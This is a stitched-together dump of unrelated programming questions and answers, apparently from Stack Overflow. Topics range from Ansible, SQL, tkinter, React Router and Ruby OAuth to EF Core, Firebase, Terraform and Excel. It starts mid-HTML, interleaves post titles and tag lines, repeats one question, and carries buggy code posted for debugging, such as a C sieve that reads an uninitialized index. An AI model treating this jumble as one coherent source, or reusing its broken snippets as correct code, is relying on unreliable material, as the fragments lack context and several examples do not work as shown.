<!-- <a-entity camera look-controls position="0 1.6 0"> <a-cursor></a-cursor>
</a-entity> -->
<a-entity camera look-controls position="0 1.6 0">
<a-entity
cursor
position="0 0 -1"
geometry="primitive: sphere; radius: 0.005"
material="color: #000000; shader: flat; opacity: 0.5"
>
</a-entity>
</a-entity>
<a-box
position="0.5 0.5 -3"
rotation="0 45 0"
color="white"
animation__mouseenter="
property: color;
to: #ff0000;
dur: 1;
startEvents: mouseenter;
"
animation__mouseleave="
property: color;
to: #ffffff;
dur: 1;
startEvents: mouseleave;
"
>
</a-box>
<a-sky color="#ECECEC"></a-sky>
</a-scene>
</body>
</html>
<!-- end snippet -->
|
It’s not possible to take text and translate it into a convenient format |
I'd like to change the permissions on files recursively in a directory tree.
Number of files is in thousands.
I did the following right now on my playbook
```
- name: find all the files inside the wordpress directory
find:
path: /home/vagrant/wordpress
file_type: file
recurse: true
register: files_found
- name: Ensure permissions on folders are in 644
file:
path: "{{item['path']}}"
mode: '0644'
loop: "{{files_found['files']}}"
```
This takes an "infinite" amount of time due
to the large number of files in the directory structur.
Is there any better aleternative especially in terms of speed of execution ?
The Ansible command module
to execute a find exec command
but is it really the best alternative ?
|
Change permissions recursively on a directory structur takes too much time . Any alternative solution? |
|ansible| |
null |
This is my query:
```
DROP TABLE `tab`;
CREATE TABLE tab (
`id` INTEGER,
`user` VARCHAR(15),
`userid` INTEGER,
`user_id` INTEGER,
`ipaddr` VARCHAR(7)
);
INSERT INTO tab
(`id`, `user`, `userid`, `user_id`, `ipaddr`)
VALUES
('1', 'Client', '10', '0', '1.1.1.1'),
('2', 'admin1', '1', '0', '2.2.2.2'),
('3', 'Client', '3', '0', '1.1.1.1'),
('4', 'admin2', '5', '0', '3.3.3.3'),
('5', 'Client', '12', '0', '4.4.4.4'),
('6', 'admin1', '1', '0', '2.2.2.2'),
('7', 'Client', '21', '0', '4.4.4.4'),
('8', 'Client', '25', '0', '6.6.6.6'),
('9', 'Sub-Client 20', '35', '0', '4.4.4.4'),
('9', 'Sub-Client 20', '35', '0', '4.4.4.4'),
('9', 'Sub-Client 20', '35', '0', '1.1.1.1'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'Client', '25', '0', '6.6.6.6'),
('8', 'user1@gmail.com', '30', '0', '7.7.7.7'),
('8', 'user1@gmail.com', '30', '0', '7.7.7.7');
SELECT
COUNT(ipaddr), `ipaddr`, GROUP_CONCAT(`userid` ORDER BY `userid` DESC ) userid
FROM tab
WHERE `user` = 'Client' OR `user` LIKE 'Sub-Client%' OR `user` LIKE '%@%'
GROUP BY `ipaddr`, `userid`
HAVING COUNT(*) > 0
ORDER By COUNT(ipaddr) DESC
```
This is the result:
```
COUNT(ipaddr) ipaddr userid
2 7.7.7.7 30,30
9 6.6.6.6 25,25,25,25,25,25,25,25,25
1 4.4.4.4 12
1 4.4.4.4 21
2 4.4.4.4 35,35
1 1.1.1.1 3
1 1.1.1.1 10
1 1.1.1.1 35
```
You may see it live: https://dbfiddle.uk/N8PO_qTN
The issue is:
1. It's not sorted by `COUNT(ipaddr)`
1. The `userid` in the output has duplicated (like 30 and 25)
1. One IP is repeated multiple times (like 1.1.1.1)
What I'm going to have this as the expected output:
```
COUNT(ipaddr) ipaddr userid
9 6.6.6.6 25
4 4.4.4.4 12, 21, 35
3 1.1.1.1 3, 10, 35
2 7.7.7.7 30
1 4.4.4.4 12
``` |
The Count and GROUP BY and GROUP_CONCAT does not group one field and remove duplicates |
My GUI application is not responsive, I want it to resize according to the window size
Currently am using .place(x,y) for placing components.
Example:
label.place(x=100,y=50)
[Not responsive](https://i.stack.imgur.com/c0mvp.png)
tried looking for a solution and was informed of .pack() method for placing component, it has 2 params relative x (relx) and relative y (rely) in respect to its frame/master. Tested it out but still my gui app isnt responsive. |
Responsive gui customtkinter |
|python|user-interface|tkinter|customtkinter| |
null |
- <kbd>Ctrl</kbd>+<kbd>H</kbd>
- Find what: `\h+$`
- Replace with: `LEAVE EMPTY`
- **TICK** *Wrap around*
- **SELECT** *Regular expression*
- <kbd>Replace all</kbd>
`\h+` stands for 1 or more horizontal spaces. |
[The error that I'm struggling, with some examples][1]
I have written a code for finding prime numbers using sieve of Eratosthenes algorithm, but the problem is my code works as it tends to be, but for only some numbers. It shows like "entering upto-value infinitely" as the error and for some numbers it works perfectly. As I started recently studying C in-depth I couldn't find what is going wrong. I request the code-ies to help me in this case, and also help me realize what is the mistake, why it happens and how to prevent it.
Here's the code:
```
#include <stdio.h>
int main()
{
int n;
printf("enter number: ");
scanf("%d",&n);
int arr[n],i,pr=2;
for(i=0;pr<=n;i++)
{
arr[i]=pr;
pr++;
}
int j,k;
while(arr[k]<=n)
{
for(j=2;j<n;j++)
{
for(k=0;k<n;k++)
{
if(arr[k]%j==0 && arr[k]>j)
arr[k]=0;
}
}
}
for(i=0;arr[i]<=n;i++)
{
if(arr[i]!=0)
printf(" %d",arr[i]);
}
printf("\n");
return 0;
}
```
[1]: https://i.stack.imgur.com/r8LC0.png |
My GUI application is not responsive, I want it to resize according to the window size
Currently am using .place(x,y) for placing components.
Example:
label.place(x=100,y=50)
[Current components when windows maximized](https://i.stack.imgur.com/c0mvp.png)
tried looking for a solution and was informed of .pack() method for placing component, it has 2 params relative x (relx) and relative y (rely) in respect to its frame/master. Tested it out but still my gui app isnt responsive. |
This is my code
```
import React, { useState } from 'react';
import { Link } from 'react-router-dom';
import { SidebarData } from './SidebarData';
import { LuMenu } from "react-icons/lu";
import { RxCross2 } from "react-icons/rx";
function Navbar() {
const [sidebar, setSidebar] = useState(false)
const showSidebar = () => setSidebar(!sidebar)
return (
<>
<div className='navbar'>
<Link to="#" className='menu-bars'>
<h1><LuMenu onClick={showSidebar}/> </h1>
</Link>
</div>
<nav className={sidebar ? "nav-menu active" : "nav-menu"}>
<ul className="nav-menu-items" onClick={showSidebar}>
<li className='navbar-toggle'>
{/* <Link to="#" className='menu-bars'>
<RxCross2 />
</Link> */}
</li>
{SidebarData.map((item, index) => {
return (
<li key={index} className={item.cName}>
{/* <Link to={item.path}>
{item.icon}
<span>{item.title}</span>
</Link> */}
</li>
)
})}
</ul>
</nav>
</>
)
}
export default Navbar;
```
```
import React from 'react';
import { AiFillHome } from "react-icons/ai";
import { LuPencilLine } from "react-icons/lu";
export const SidebarData = [
{
title: "Home",
path: "/",
icon: <AiFillHome/>,
cName: "nav-text"
},
{
title: "Entry",
path: "/entry",
icon: <LuPencilLine/>,
cName: "nav-text"
}
]
```
```
import React from 'react';
import { BrowserRouter as Router, Routes, Route } from 'react-router-dom';
import Home from './pages/Home';
import Entry from './pages/Entry';
import Header from './components/Header';
function App() {
return (
<div className="App">
<Header/>
<Router>
<Routes>
<Route path="/" element={<Home />} />
<Route path="/entry" element={<Entry />} />
</Routes>
</Router>
</div>
);
}
export default App;
```
This is the error that i am getting.
```
[Error] TypeError: Right side of assignment cannot be destructured
LinkWithRef (bundle.js:37906)
renderWithHooks (bundle.js:24762)
updateForwardRef (bundle.js:27331)
callCallback (bundle.js:14358)
dispatchEvent
invokeGuardedCallbackDev (bundle.js:14402)
invokeGuardedCallback (bundle.js:14459)
beginWork$1 (bundle.js:34323)
performUnitOfWork (bundle.js:33571)
workLoopSync (bundle.js:33494)
renderRootSync (bundle.js:33467)
performConcurrentWorkOnRoot (bundle.js:32862:93)
workLoop (bundle.js:43931)
flushWork (bundle.js:43909)
performWorkUntilDeadline (bundle.js:44146)
[Error] The above error occurred in the <Link> component:
LinkWithRef@http://localhost:3000/static/js/bundle.js:37893:14
div
Navbar@http://localhost:3000/static/js/bundle.js:249:80
div
div
Header
div
App
Consider adding an error boundary to your tree to customize error handling behavior.
Visit https://reactjs.org/link/error-boundaries to learn more about error boundaries.
logCapturedError (bundle.js:26865)
(anonymous function) (bundle.js:26890)
callCallback (bundle.js:22796)
commitUpdateQueue (bundle.js:22814)
commitLayoutEffectOnFiber (bundle.js:30860)
commitLayoutMountEffects_complete (bundle.js:31953)
commitLayoutEffects_begin (bundle.js:31942)
commitLayoutEffects (bundle.js:31888)
commitRootImpl (bundle.js:33797)
commitRoot (bundle.js:33677)
finishConcurrentRender (bundle.js:32997)
performConcurrentWorkOnRoot (bundle.js:32925)
workLoop (bundle.js:43931)
flushWork (bundle.js:43909)
performWorkUntilDeadline (bundle.js:44146)
```
I am observed that When i am commenting the <Link> part from the code i do not get the error, but else I get error mentioned above, am i doing something wrong
I haven't found my error any where so i am posting this, i tried using useNavigation, but i could not implement it |
I have a Rails API with a variety of frontend clients.
I’m setting up Google Sign-in/up with OAuth2 (via Google Identity), and am having issues verifying the token that comes from Google - it seems simple with Python/Java/Node.js/PHP ([see their docs](https://developers.google.com/identity/gsi/web/guides/verify-google-id-token)), but with Ruby it is proving difficult.
For context, my basic flow is:
1) Authentication button gets clicked on the client.
2) User completes authentication with Google, who redirects the request back to my Rails API, with the user’s email and a token.
3) Rails API searches for existing user with that email; if they exist, we authenticate them. If not, we create a new user with that email and then authenticate them.
I’m trying to verify the token in order to make sure that the request isn’t fake, i.e. someone/something pretending to be Google.
I’ve tried hitting the endpoint directly using the `jti` field that comes back in the `credential` response from Google, i.e. https://oauth2.googleapis.com/tokeninfo?id_token=my_token_here, but it says it is invalid each time, even though I literally just received it from Google each time that I test it.
When I go to [Google’s docs for verifying the token](https://developers.google.com/identity/gsi/web/guides/verify-google-id-token), the example for Python is extremely clear - but since there is no Ruby client, it leads me to the link “[Use one of the Google API Client Libraries](https://developers.google.com/api-client-library)”, so I click on the Ruby one which [takes me here](https://github.com/googleapis/google-api-ruby-client), which then tells me that I should use [the more modern clients](https://github.com/googleapis/google-cloud-ruby). So then I bounce between those last two links, and within those GitHub repositories I’ve been unable to find anything useful.
I tried using [this `googleauth` gem](https://github.com/googleapis/google-auth-library-ruby), but the only useful methods seem to be `Google::Auth::IDTokens.verify_oidc(access_token)` as well as `Google::Auth::IDTokens.verify_iap(access_token)`, but both of those return saying it is an invalid token, and I’m not using OIDC (open ID connect) nor IAP (Identity-aware Proxy), as far as I know, so it makes sense that it returns as invalid.
Any help would be much appreciated - I’m sure other folks have had to verify tokens in a similar manner before using Ruby.
Best,
Michael |
The issue with your code is that your getGrade method always returns the grade based on the first mark in the actualMark array and doesn't consider other marks. This is because you have a return statement inside the loop, and it exits the loop and returns the grade based on the first mark it encounters.
To fix this issue in another way, you could iterate through all the marks, calculate the grade for each mark, and store the grades in an array. Then, you can return the array of grades or use it as needed.
public String[] getGrades() {
String[] grades = new String[5]; // Assuming you have 5 marks
for (int i = 0; i < 5; ++i) {
if (actualMark[i] >= 85) {
grades[i] = "A";
} else if (actualMark[i] >= 75) {
grades[i] = "A-";
} else if (actualMark[i] >= 70) {
grades[i] = "B+";
} else if (actualMark[i] >= 65) {
grades[i] = "B";
} else if (actualMark[i] >= 60) {
grades[i] = "B-";
} else if (actualMark[i] >= 55) {
grades[i] = "C+";
} else if (actualMark[i] >= 50) {
grades[i] = "C";
} else if (actualMark[i] >= 45) {
grades[i] = "D";
} else if (actualMark[i] >= 35) {
grades[i] = "E";
} else if (actualMark[i] < 35) {
grades[i] = "F";
}
}
return grades;
}
And for your main:
for(int i = 0; i < 5; i++){
System.out.println("The course code is " + b.courseCode[i]);
System.out.println("The course name is " + b.courseName[i]);
System.out.println("The session is " + b.session[i]);
System.out.println("The semester is " + b.semester[i]);
System.out.println("The mark is " + b.actualMark[i]);
System.out.println("The grade is " + b.getGrades()[i]);
} |
I'm coding a program to find perfect numbers. I have found some interesting properties and worked on my code to generate perfect numbers. This is my idea:
```static List<int> TesterPerfectNumber(int upperbound)
{
List<int> nums = new List<int>();
for (int i = 2; i < upperbound; i++)
{
if (IsPrime(i))
{
int mersenneNumber = (int)Math.Pow(2, i) - 1;
if (IsPrime(mersenneNumber))
{
int perfectNumber = (int)Math.Pow(2, i - 1) * mersenneNumber;
nums.Add(perfectNumber);
}
}
}
return nums;
}```
The output is correct for the first 4 perfect numbers, however I don't know why it failed on the 5th and outputted negative numbers (with `foreach (int j in TesterPerfectNumber(20)){Console.WriteLine(j);}`):
[](https://i.stack.imgur.com/WWL4d.png)
I suspect the bug is in my algorithm, but the alternative form of finding perfect numbers is (2^(p-1))*(2^p - 1) with p and 2^p-1 being primes. Also, I have already found another way to find perfect numbers but consumes more storage and time, basically looping and finding factors of all positive numbers and adding up until it reaches the upperbound limit.
Can you help me debug the code or come up with another reasonable solution to my code? Or are there any limits to the `List<T>` or `int` that I haven't taken into consideration? Please help me and thanks. |
Errors in outputing elements in a List<int> |
I got it working with slight modification of what @LãNgọcHải suggested:
```
const volumeResetHandler = async () => {
inputRef.current.value = 0;
(inputRef.current as any).addEventListener('change', volumeChangeHandler);
(inputRef.current as any).dispatchEvent(new Event('change', { bubbles: true }));
}
```
Thanks a lot @LãNgọcHải .
Only a small issue I have is I had a logic based on `event.isTrusted==true` which is now `false` for any explicitly triggering event. I would have to find some work around for that. I guess that's what `bubbles` is for, isn't it @LãNgọcHải ? |
I want to perform bulk insert into MariaDB using JdbcTemplate in Spring, but even when I append
?rewriteBatchedStatements=true to the jdbc-url, the inserts are still being done one by one.
my code works like this
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...)
i wanna this
INSERT INTO tbl (1, 2, ...) VALUES (val1, val2, ...), (val1, val2, ...), ...
Is there any other way? What am I missing?
This is my code down here
```
spring.datasource.jdbc-url=jdbc:log4jdbc:mariadb://ip/db?rewriteBatchedStatements=true&profileSQL=true&logger=Slf4JLogger&maxQuerySizeToLog=999999
public void insertBatch(List<object> objectList) {
String sql = "";
sql += "INSERT INTO TBL_NAME" +
" (columns1, 2...) " +
"VALUES (?, ?...) ";
jdbcDBTemplate.batchUpdate(sql, new BatchPreparedStatementSetter() {
@Override
public void setValues(PreparedStatement ps, int i) throws SQLException {
object object = objectList.get(i);
ps.setInt(1, object.getCol1());
ps.setInt(2, object.getCol2());
}
@Override
public int getBatchSize() {
return tblInfoDetailList.size();
}
});
```
it's toooo slow.. plz help me
|
How can I perform bulk insert into MariaDB using JdbcTemplate in Spring? |
|spring-boot|mariadb|jdbctemplate| |
null |
I am working on a dotnet core project where I am using repository pattern and using the repositories inside a mediator handler.
I have a one method inside a repository which return multiple records from database:
```
public List<T> GetAll(List<Expression<Func<T, object>>>? includes = null)
{
IQueryable<T> query = _dbSet.AsQueryable();
if (includes != null)
{
query = includes.Aggregate(query, (current, include) => current.Include(include));
}
return query.AsNoTracking().ToList();
}
```
I am providing includes in handler like below:
```
public async Task<List<Office>> Handle(Office request, CancellationToken cancellationToken)
{
var includes = new List<Expression<Func<Office, object>>>
{
c => c.OfficeAddresses,
c => c.OfficeDepartments.Select(d => d.Department).Select(cc => cc.Phones),
};
return await _repository.GetAll(includes: includes);
}
```
I am getting error: ```The expression 'c.OfficeDepartments.AsQueryable().Select(x => x.Department)' is invalid inside an 'Include' operation, since it does not represent a property access: 't => t.MyProperty'. To target navigations declared on derived types, use casting ('t => ((Derived)t).MyProperty') or the 'as' operator ('t => (t as Derived).MyProperty'). Collection navigation access can be filtered by composing Where, OrderBy(Descending), ThenBy(Descending), Skip or Take operations```
|
Verifying Google Identity OAuth2 token with Ruby |
|ruby-on-rails|ruby|oauth-2.0|google-oauth| |
In a dictionary in Python, if you have items with the same keys, they just get overwritten by further items, so in your dict finally you could only have 1 item with the key "A".
My suggestion to you is to try to get all that in a single expression, and simply parse that, so 1 item is key, next is data, next is key and so on.
You can do that simply by replacing ":" with ",", as I did in the following code
```
array = ("A", "Red", "A", "Blue", "A", "Green", "B", "Yellow", "C", "Black", "B", "smth")
dictionary = {}
for item_key, item in zip(array[::2], array[1::2]):
if item_key in dictionary:
if type(dictionary[item_key]) == list:
dictionary[item_key].append(item)
else:
a = dictionary[item_key]
dictionary[item_key] = [a, item]
else:
dictionary[item_key] = item
```
|
error CS0029: Cannot implicitly convert type 'System.Threading.Tasks.Task<Firebase.Auth.AuthResult>' to 'Firebase.Auth.FirebaseUser'
```csharp
public void OnClickSignIn()
{
Copy
FirebaseAuth auth = FirebaseAuth.DefaultInstance;
Debug.Log("Clicked SignIn");
string emailText = emailSignin.GetComponent<TMP_InputField>().text;
string passwordText = passwordSignin.GetComponent<TMP_InputField>().text;
auth.SignInWithEmailAndPasswordAsync(emailText,
passwordText).ContinueWithOnMainThread(task =>
{
if (task.IsCanceled)
{
Debug.Log("SignIn Canceled");
Debug.LogError("SignInWithEmailAndPasswordAsync was canceled.");
return;
}
if (task.IsFaulted)
{
Debug.Log("SignIn Failed");
Debug.LogError("SignInWithEmailAndPasswordAsync encountered an error: " + task.Exception);
signinFailNotification.OpenNotification();
return;
}
FirebaseUser newUser = task;
if (newUser != null)
{
signinSuccessNotification.OpenNotification();
Debug.LogFormat("User signed in successfully: {0} ({1})",
newUser.DisplayName, newUser.UserId);
}
});
}
public void OnClickSignUp()
{
Copy
FirebaseAuth auth = FirebaseAuth.DefaultInstance;
Debug.Log("Clicked SignUp");
string emailText = emailSignup.GetComponent<TMP_InputField>().text;
string passwordText = passwordSignup.GetComponent<TMP_InputField>().text;
auth.CreateUserWithEmailAndPasswordAsync(emailText,
passwordText)
.ContinueWithOnMainThread(task =>
{
if (task.IsCanceled)
{
Debug.Log("Signup Canceled");
Debug.LogError("CreateUserWithEmailAndPasswordAsync was canceled.");
return;
}
if (task.IsFaulted)
{
Debug.Log("Signup Failed");
Debug.LogError("CreateUserWithEmailAndPasswordAsync encountered an error: " + task.Exception);
signupFailNotification.OpenNotification();
return;
}
// Firebase user has been created.
Debug.Log("Signup Successful");
FirebaseUser newUser = task;
if (newUser != null)
{
writeNewUser(newUser.UserId,newUser.Email);
signupSuccessNotification.OpenNotification();
Debug.LogFormat("Firebase user created successfully: {0} ({1})",
newUser.DisplayName, newUser.UserId);
}
});
``` |
|c#|list| |
null |
My problem solved. I made mistake and forgot designate a variables as global. But now, I merely send vector weights and vector delay signal to function.
___________
Thanks to all!! |
You can use a pretty simple ftp server for android(wifi FTP),i use a PRO version .On my android TV i use KODi there is ftp client and everything work like charm.It's a verry good combination.Try it ;) |
Am I doing something wrong or is this a server problem? This hangs up the browser (Safari and Firefox under MACOS):
```<!DOCTYPE html>
<HTML>
<BODY>
<?php
$qq = str_repeat("X",409998);
echo $qq;
?>
</BODY>
</HTML>```
Running on Google's AppEngine, standard environment, PHP 8.2. If I shorten the string, it works fine. While the problem is consistent, if I play with the length of the string, I can get it to work with some longer strings. |
Why does the server hang for GAE php8.2 standard environment when echoing a long string? |
|php|macos|google-app-engine|firefox|safari| |
I have vector of index, that I'd like to filter by. In each column a different row will be selected. The output will be one vector of filtered values with the length of the number of columns. Bud without using the slow cycle. For example
set.seed(123)
(M <- matrix(rnorm(25), 5))
[,1] [,2] [,3] [,4] [,5]
[1,] -0.56047565 1.7150650 1.2240818 1.7869131 -1.0678237
[2,] -0.23017749 0.4609162 0.3598138 0.4978505 -0.2179749
[3,] 1.55870831 -1.2650612 0.4007715 -1.9666172 -1.0260044
[4,] 0.07050839 -0.6868529 0.1106827 0.7013559 -0.7288912
[5,] 0.12928774 -0.4456620 -0.5558411 -0.4727914 -0.6250393
indíces <- c(2, 3, 1, 4, 4)
vect <- c()
for(i in 1:5) {
vect <- c(vect, M[indíces[i], i])
}
vect
[1] -0.2301775 -1.2650612 1.2240818 0.7013559 -0.7288912
I have larger data set and for cycle isn't therefore ideal. But I couldn't think of anything better, or find anything better. |
Select various cells according to different combinations of columns and rows |
|r| |
I have been trying to code collision for a school project, however I quickly noticed that when I draw a bitmap using the `canvas.DrawBitmap(currentImage, position.X, position.Y, paint)` function, it did not match the size of the radius, as the image appeared bigger then the actual circle. this is not an issue when i use the `canvas.DrawCircle(position.X, position.Y, size.Width / 2, new Paint() { Color = Color.Black })` function, as it is scaled properly. How do I create a bitmap that is scaled correctly to the actual circle?
- relevent code:
public Sprite(float x, float y, float size, Context context) : base(x, y)
{
int id = (int)typeof(Resource.Drawable).GetField(General.IMG_BALL).GetValue(null);
image = BitmapFactory.DecodeResource(context.Resources, id);
this.size = new SizeF(size, size);
paint = new Paint(PaintFlags.AntiAlias);
paint.AntiAlias = false;
paint.FilterBitmap = false;
paint.Dither = true;
paint.SetStyle(Paint.Style.Fill);
}
public void DisplayImage(Canvas c)
{
Matrix matrix = new Matrix();
matrix.PostTranslate(position.X, position.Y);
matrix.PreScale(size.Width, size.Height);
c.DrawBitmap(image, matrix, paint);
} |
I am trying to extend Eigen's matrix classes to work with my own library's using their #define. Eigen is located in `/usr/local/include`. My project is in a separate folder. I followed the guide specified [in their documentation](https://eigen.tuxfamily.org/dox/TopicCustomizing_Plugins.html).
Here is where I defined the relative paths for my extensions in a file called `SparseMatrix`.
```
#define EIGEN_MATRIXBASE_PLUGIN "src/Eigen_Extension/Matrix_Extension.hpp"
#define EIGEN_SPARSEMATRIX_PLUGIN "src/Eigen_Extension/Sparse_Matrix_Extension.hpp"
#include <Eigen/Core>
#include <Eigen/Sparse>
```
When I try to compile with `g++ test.cpp` , I get the error
```
SparseMatrix:59:33: fatal error: src/Eigen_Extension/Matrix_Extension.hpp: No such file or directory
59 | #define EIGEN_MATRIXBASE_PLUGIN "src/Eigen_Extension/Matrix_Extension.hpp"
| ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
compilation terminated.
```
Despite the error showing my file, I know gcc is trying to include `src/Eigen_Extension/Matrix_Extension.hpp` in Eigen's .h file. This does compile if I use an absolute path.
My question boils down to: (preferably) without build systems or arguments. how can I make this work with a relative path?
I tried creating a convoluted define structure using \__FILE_\_.
Matrix_Extension.hpp:
```
#include "../../SparseMatrix"
#ifdef EIGEN_MATRIXBASE_PLUGIN
// source code
#else
#EIGEN_MATRIXBASE_PLUGIN __FILE__ //to get absolute path of extension file
#endif
```
SparseMatrix:
```
#include src/Eigen_Extension/Matrix_Extension.hpp
#include <Eigen/Core>
```
Unfortunately, this ran into issues with the my code not having Eigen included despite the define guards. |
How can I include a file using Eigen's plugin include? |
|c++|c++17|eigen| |
null |
# Option #1
We can do that with a [lifecycle precondition][1] in a null_resource
A couple of things before we dive into the code:
- Your code has two `sc1_default` variables I'm assuming that the second one was a typo and it what we need there is `sc1_default`
- For additional validation use `type` in the variables, it's a good practice, makes the code more readable and if someone accidentally passes the wrong type the code fails gracefully.
see sample code below
``` lang-hcl
variable "sc1_default" {
type = bool
default = false
}
variable "sc2_default" {
type = bool
default = false
}
variable "sc3_default" {
type = bool
default = true
}
variable "sc4_default" {
type = bool
default = true
}
resource "null_resource" "validation" {
lifecycle {
precondition {
condition = (
(var.sc1_default ? 1 : 0) +
(var.sc2_default ? 1 : 0) +
(var.sc3_default ? 1 : 0) +
(var.sc4_default ? 1 : 0)
) < 2
error_message = "Only one sc can be true"
}
}
}
```
You can see I set the `sc3_default` and `sc4_default` both to true just to trigger the error ...
The condition is the core of this validation we are just adding all the true with the help of shorthand if syntax `(var.sc_default ? 1 : 0)` and the total should be less than two, I'm assuming that all false is OK, but if not you can change that logic to check that is precisely one.
A terraform plan on that code will error out with the following message:
``` lang-txt
Planning failed. Terraform encountered an error while generating this plan.
╷
│ Error: Resource precondition failed
│
│ on main.tf line 24, in resource "null_resource" "validation":
│ 24: condition = (
│ 25: (var.sc1_default ? 1 : 0) +
│ 26: (var.sc2_default ? 1 : 0) +
│ 27: (var.sc3_default ? 1 : 0) +
│ 28: (var.sc4_default ? 1 : 0)
│ 29: ) < 2
│ ├────────────────
│ │ var.sc1_default is false
│ │ var.sc2_default is false
│ │ var.sc3_default is true
│ │ var.sc4_default is true
│
│ Only one sc can be true
```
____
# Option #2
If you can change the input variables we could reduce it to just one with a `list(bool)` the code will be smaller and the validation would be right on the variable
``` lang-hcl
variable "sc_default" {
type = list(bool)
description = "list of sc default values"
default = [false, false, false, false]
validation {
condition = length(var.sc_default) == 4
error_message = "Four defaults expected"
}
validation {
condition = sum([for x in var.sc_default : x ? 1 : 0]) < 2
error_message = "Only one sc can be true"
}
}
```
[1]: https://developer.hashicorp.com/terraform/language/meta-arguments/lifecycle#custom-condition-checks |
|mysql| |
`WORKDAY.INTL()` is working as intended.
In `WORKDAY.INTL()` function `1` represents a `non-workday` and `0` represents a `workday`. That said, `29th Feb'24` is `Thursday` and you have made it `non-working day`, hence in your formula: only `Monday` and `Saturday` are `workdays` rest are `non workdays`. Read `MSFT` Documentations [here][1].
[![enter image description here][2]][2]
----------
**What has been used:**
=WORKDAY.INTL(B3,1,"0111101",Holidays[[Date]:[Date]])
----------
**What needs to be used:**
[![enter image description here][3]][3]
----------
=WORKDAY.INTL(B3,1,"0000100",Holidays[[Date]:[Date]])
----------
Or, instead of using `"0000100"` use `16`
=WORKDAY.INTL(B3,1,16,Holidays[[Date]:[Date]])
----------
In context of your OP, the formula will be:
=WORKDAY.INTL(K4, L2, "0000100", holidays!A2:A9)
----------
[1]: https://support.microsoft.com/en-us/office/workday-intl-function-a378391c-9ba7-4678-8a39-39611a9bf81d
[2]: https://i.stack.imgur.com/jNO1s.png
[3]: https://i.stack.imgur.com/mESCZ.png
|
Thank you for the help in advance.
I am using Spring boot webflux 3 with Spring doc Open API 2.4
Here is my response entity records
```
public record UserResponse(
Integer id,
String name,
ScoreResponse scoreSummary
){
}
```
```
public record ScoreResponse(
Integer avgScore,
List<Score> score
){
public record Score(
Integer scoreId,
Integer score
){
}
}
```
Here is the handler class
```
@Component
@RequiredArgsConstructor
public class UserHandler {
private final UserService userService;
private final UserMapper userMapper;
private final ClientAuthorizer clientAuthorizer;
@Bean
@RouterOperations({
@RouterOperation(
path = "/user/{userId}",
produces = {MediaType.APPLICATION_JSON_VALUE},
method = RequestMethod.GET,
beanClass = UserHandler.class,
beanMethod = "getById",
operation = @Operation(
description = "GET user by id", operationId = "getById", tags = "users",
responses = @ApiResponse(
responseCode = "200",
description = "Successful GET operation",
content = @Content(
schema = @Schema(
implementation = UserResponse.class
)
)
),
parameters = {
@Parameter(in = ParameterIn.PATH,name = "userId")
}
)
)
})
public @NonNull RouterFunction<ServerResponse> userIdRoutes() {
return RouterFunctions.nest(RequestPredicates.path("/user/{userId}"),
RouterFunctions.route()
.GET("", this::getById)
.build());
}
@NonNull
Mono<ServerResponse> getById(@NonNull ServerRequest request) {
String userId = request.pathVariable("userId");
return authorize(request.method(), request.requestPath())
.then(userService.getUserWithScore(userId))
.flatMap(result -> ServerResponse.ok().body(Mono.just(result), UserResponse.class))
.doOnEach(serverResponseSignal -> LoggingHelper.addHttpStatusToContext(serverResponseSignal, HttpStatus.OK));
}
....
}
```
The expected example in Swagger UI is
```
{
"id": 1073741824,
"name": "string",
"scoreSummary": {
"avgScore": 1073741824,
"score": [
{
"scoreId": 1073741824,
"score": 1073741824
}
]
}
}
```
But actual example is
```
{
"id": 1073741824,
"name": "string",
"scoreSummary": {
"avgScore": 1073741824,
"score": [
"string"
]
}
}
```
Additionally I can see an error in the UI
```
Errors
Resolver error at responses.200.content.application/json.schema.$ref
Could not resolve reference: JSON Pointer evaluation failed while evaluating token "score" against an ObjectElement
```
Please help me to find what I am missing.
After days of research I found this and it worked and I got expected result. But I need ro understand is there any better approach or is this fine.
Added below bean definition in my handler class.
```
@Bean
public OpenApiCustomizer schemaCustomizer() {
ResolvedSchema resolvedSchema = ModelConverters.getInstance()
.resolveAsResolvedSchema(new AnnotatedType(Score.class));
return openApi -> openApi
.schema(resolvedSchema.schema.getName(), resolvedSchema.schema);
}
``` |
The expression 'x' is invalid inside an 'Include' operation |